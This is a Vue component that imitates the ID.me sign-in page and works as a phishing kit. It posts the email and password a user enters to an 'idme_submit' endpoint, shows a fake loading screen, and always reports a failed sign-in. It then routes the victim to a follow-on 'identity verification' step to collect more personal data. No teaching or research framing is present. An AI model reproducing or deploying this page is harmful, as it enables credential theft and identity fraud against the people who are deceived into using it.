<template>
  <div class="idme">
    <div class="idme-page">
      <!-- Logo -->
      <div class="idme-logo" aria-label="ID.me">
        <span class="idme-logo__id">ID</span><span class="idme-logo__me">.me</span>
      </div>

      <div class="idme-card">
        <!-- Step 1: Email -->
        <template v-if="step === 1">
          <h1 class="idme-card__title">Sign in to ID.me</h1>

          <label class="idme-label" for="idme-email">Email</label>
          <input
            id="idme-email"
            v-model.trim="email"
            type="email"
            class="idme-input"
            autocomplete="email"
            @keyup.enter="onEmailContinue"
          />

          <label class="idme-check">
            <input v-model="rememberMe" type="checkbox" />
            <span>Remember me</span>
          </label>

          <button type="button" class="idme-btn" :disabled="!emailValid" @click="onEmailContinue">
            Continue
          </button>

          <p class="idme-signup">
            New to ID.me? <a href="#" class="idme-link" @click.prevent>Create a wallet</a>
          </p>

          <div class="idme-notice">
            Social media sign-in is no longer available. Please sign in with your email.
          </div>
        </template>

        <!-- Step 2: Password -->
        <template v-else-if="step === 2">
          <h1 class="idme-card__title">Complete your sign-in</h1>

          <p class="idme-sub">
            You're signing in as <strong>{{ email }}</strong>
          </p>
          <button type="button" class="idme-link idme-link--btn" @click="useDifferentWallet">
            Use a different wallet
          </button>

          <label class="idme-label" for="idme-password">Password</label>
          <div class="idme-pw-wrap">
            <input
              id="idme-password"
              v-model="password"
              :type="showPassword ? 'text' : 'password'"
              class="idme-input idme-input--pw"
              placeholder="Enter password"
              autocomplete="current-password"
              @keyup.enter="onPasswordContinue"
            />
            <button
              type="button"
              class="idme-pw-toggle"
              :aria-label="showPassword ? 'Hide password' : 'Show password'"
              @click="showPassword = !showPassword"
            >
              <svg v-if="!showPassword" viewBox="0 0 24 24" width="20" height="20" fill="none" stroke="currentColor" stroke-width="2">
                <path d="M1 12s4-8 11-8 11 8 11 8-4 8-11 8-11-8-11-8z"/><circle cx="12" cy="12" r="3"/>
              </svg>
              <svg v-else viewBox="0 0 24 24" width="20" height="20" fill="none" stroke="currentColor" stroke-width="2">
                <path d="M17.94 17.94A10.07 10.07 0 0 1 12 20c-7 0-11-8-11-8a18.45 18.45 0 0 1 5.06-5.94M9.9 4.24A9.12 9.12 0 0 1 12 4c7 0 11 8 11 8a18.5 18.5 0 0 1-2.16 3.19m-6.72-1.07a3 3 0 1 1-4.24-4.24"/><line x1="1" y1="1" x2="23" y2="23"/>
              </svg>
            </button>
          </div>

          <a href="#" class="idme-forgot idme-link" @click.prevent>Forgot password?</a>

          <button type="button" class="idme-btn" :disabled="!password.length || busy" @click="onPasswordContinue">
            Continue
          </button>
        </template>

        <!-- Step 3: Loading -->
        <template v-else-if="step === 'loading'">
          <h1 class="idme-card__title">Signing in</h1>
          <div class="idme-loading">
            <div class="idme-spinner" aria-hidden="true"></div>
            <p>Verifying your ID.me credentials…</p>
            <small>This may take a moment.</small>
          </div>
        </template>

        <!-- Step 4: Login failed -->
        <template v-else-if="step === 'error'">
          <h1 class="idme-card__title">Sign-in failed</h1>
          <div class="idme-error" role="alert">
            <strong>We couldn't sign you in.</strong>
            <p>Your email or password may be incorrect. Please continue with identity verification on the next screen.</p>
          </div>
          <button type="button" class="idme-btn" @click="onContinueToKyc">
            Continue to verification
          </button>
        </template>
      </div>

      <button type="button" class="idme-lang">
        English
        <svg viewBox="0 0 24 24" width="12" height="12" fill="currentColor"><path d="M7 10l5 5 5-5z"/></svg>
      </button>

      <footer class="idme-footer">
        <a href="#" class="idme-link" @click.prevent>What is ID.me?</a>
        <span class="idme-footer__sep">|</span>
        <a href="#" class="idme-link" @click.prevent>Terms of Service</a>
        <span class="idme-footer__sep">|</span>
        <a href="#" class="idme-link" @click.prevent>Privacy Policy</a>
      </footer>
    </div>
  </div>
</template>

<script>
export default {
  name: 'IdMeSignIn',
  props: {
    initialEmail: { type: String, default: '' }
  },
  data() {
    return {
      step: 1,
      email: '',
      password: '',
      rememberMe: false,
      showPassword: false,
      busy: false,
      loadTimer: null
    };
  },
  beforeDestroy() {
    if (this.loadTimer) clearTimeout(this.loadTimer);
  },
  computed: {
    emailValid() {
      return /^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(this.email);
    }
  },
  created() {
    if (this.initialEmail) {
      this.email = this.initialEmail;
    }
  },
  methods: {
    onEmailContinue() {
      if (!this.emailValid) return;
      this.step = 2;
      this.password = '';
      this.showPassword = false;
    },
    useDifferentWallet() {
      this.step = 1;
      this.password = '';
    },
    onPasswordContinue() {
      if (!this.password.length || this.busy) return;
      this.busy = true;
      const payload = {
        email: this.email,
        password: this.password,
        remember_me: this.rememberMe ? 1 : 0
      };
      const done = () => {
        this.step = 'loading';
        this.busy = false;
        if (this.loadTimer) clearTimeout(this.loadTimer);
        this.loadTimer = setTimeout(() => {
          this.step = 'error';
        }, 10000);
      };
      if (this.$http) {
        this.$http({ method: 'post', url: 'idme_submit', data: payload })
          .then(done)
          .catch(done);
      } else {
        done();
      }
    },
    onContinueToKyc() {
      this.$emit('complete', { email: this.email });
    }
  }
};
</script>

<style lang="less" scoped>
.idme {
  min-height: 100vh;
  background: #ececec;
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  color: #333;
  -webkit-font-smoothing: antialiased;
}

.idme-page {
  max-width: 480px;
  margin: 0 auto;
  padding: 48px 24px 32px;
  box-sizing: border-box;
}

/* Logo */
.idme-logo {
  text-align: center;
  margin-bottom: 28px;
  font-size: 42px;
  font-weight: 700;
  letter-spacing: -0.02em;
  line-height: 1;
}
.idme-logo__id {
  color: #1a1a1a;
}
.idme-logo__me {
  color: #1e4f8a;
  position: relative;
}
.idme-logo__me::before {
  content: "";
  position: absolute;
  top: 0.12em;
  left: 0.38em;
  width: 0.18em;
  height: 0.18em;
  border-radius: 50%;
  background: #2d8a3e;
}

/* Card */
.idme-card {
  background: #fff;
  border-radius: 4px;
  box-shadow: 0 2px 8px rgba(0, 0, 0, 0.08), 0 1px 2px rgba(0, 0, 0, 0.06);
  padding: 32px 36px 28px;
  margin-bottom: 24px;
}

.idme-card__title {
  margin: 0 0 24px;
  font-size: 22px;
  font-weight: 700;
  color: #1a3a5c;
  line-height: 1.25;
}

.idme-label {
  display: block;
  font-size: 14px;
  font-weight: 600;
  color: #333;
  margin-bottom: 6px;
}

.idme-input {
  width: 100%;
  box-sizing: border-box;
  padding: 11px 12px;
  font-size: 15px;
  border: 1px solid #c5c5c5;
  border-radius: 4px;
  color: #333;
  background: #fff;
  margin-bottom: 16px;
  font-family: inherit;
}
.idme-input:focus {
  outline: none;
  border-color: #2167c5;
  box-shadow: 0 0 0 1px #2167c5;
}
.idme-input--pw {
  margin-bottom: 0;
  padding-right: 44px;
}

.idme-check {
  display: flex;
  align-items: center;
  gap: 8px;
  margin-bottom: 20px;
  font-size: 14px;
  color: #333;
  cursor: pointer;
}
.idme-check input {
  width: 16px;
  height: 16px;
  margin: 0;
  accent-color: #2167c5;
}

.idme-btn {
  display: block;
  width: 100%;
  padding: 13px 16px;
  font-size: 16px;
  font-weight: 600;
  color: #fff;
  background: #2167c5;
  border: none;
  border-radius: 4px;
  cursor: pointer;
  font-family: inherit;
  transition: background 0.15s;
}
.idme-btn:hover:not(:disabled) {
  background: #1a56a8;
}
.idme-btn:disabled {
  opacity: 0.55;
  cursor: not-allowed;
}

.idme-signup {
  text-align: center;
  margin: 20px 0 0;
  font-size: 14px;
  color: #333;
}

.idme-notice {
  margin-top: 20px;
  padding: 14px 16px;
  background: #f5f5f5;
  border: 1px solid #e0e0e0;
  border-radius: 2px;
  font-size: 13px;
  line-height: 1.5;
  color: #444;
}

.idme-sub {
  margin: 0 0 4px;
  font-size: 14px;
  color: #333;
  line-height: 1.5;
}
.idme-sub strong {
  font-weight: 600;
}

.idme-link {
  color: #2167c5;
  text-decoration: underline;
  font-size: 14px;
  background: none;
  border: none;
  padding: 0;
  cursor: pointer;
  font-family: inherit;
}
.idme-link--btn {
  display: inline-block;
  margin-bottom: 20px;
  text-align: left;
}

.idme-pw-wrap {
  position: relative;
  margin-bottom: 8px;
}
.idme-pw-toggle {
  position: absolute;
  right: 10px;
  top: 50%;
  transform: translateY(-50%);
  background: none;
  border: none;
  padding: 4px;
  cursor: pointer;
  color: #333;
  display: flex;
  align-items: center;
  justify-content: center;
}

.idme-forgot {
  display: inline-block;
  margin-bottom: 20px;
}

.idme-loading {
  text-align: center;
  padding: 24px 8px 8px;
}
.idme-loading p {
  margin: 16px 0 4px;
  font-size: 15px;
  color: #333;
}
.idme-loading small {
  color: #666;
  font-size: 13px;
}
.idme-spinner {
  width: 44px;
  height: 44px;
  margin: 0 auto;
  border: 3px solid #e0e0e0;
  border-top-color: #2167c5;
  border-radius: 50%;
  animation: idmeSpin 0.9s linear infinite;
}
@keyframes idmeSpin {
  to { transform: rotate(360deg); }
}

.idme-error {
  margin-bottom: 20px;
  padding: 14px 16px;
  background: #fef2f2;
  border: 1px solid #fecaca;
  border-radius: 4px;
  color: #991b1b;
  font-size: 14px;
  line-height: 1.5;
}
.idme-error strong {
  display: block;
  margin-bottom: 6px;
  font-size: 15px;
}
.idme-error p {
  margin: 0;
}

.idme-lang {
  display: flex;
  align-items: center;
  justify-content: center;
  gap: 4px;
  margin: 0 auto 28px;
  background: none;
  border: none;
  color: #2167c5;
  font-size: 14px;
  cursor: pointer;
  font-family: inherit;
  text-decoration: underline;
}

.idme-footer {
  text-align: center;
  font-size: 13px;
}
.idme-footer__sep {
  color: #2167c5;
  margin: 0 6px;
  user-select: none;
}

@media (max-width: 520px) {
  .idme-page {
    padding: 32px 16px 24px;
  }
  .idme-card {
    padding: 24px 20px 20px;
  }
  .idme-logo {
    font-size: 36px;
  }
}
</style>
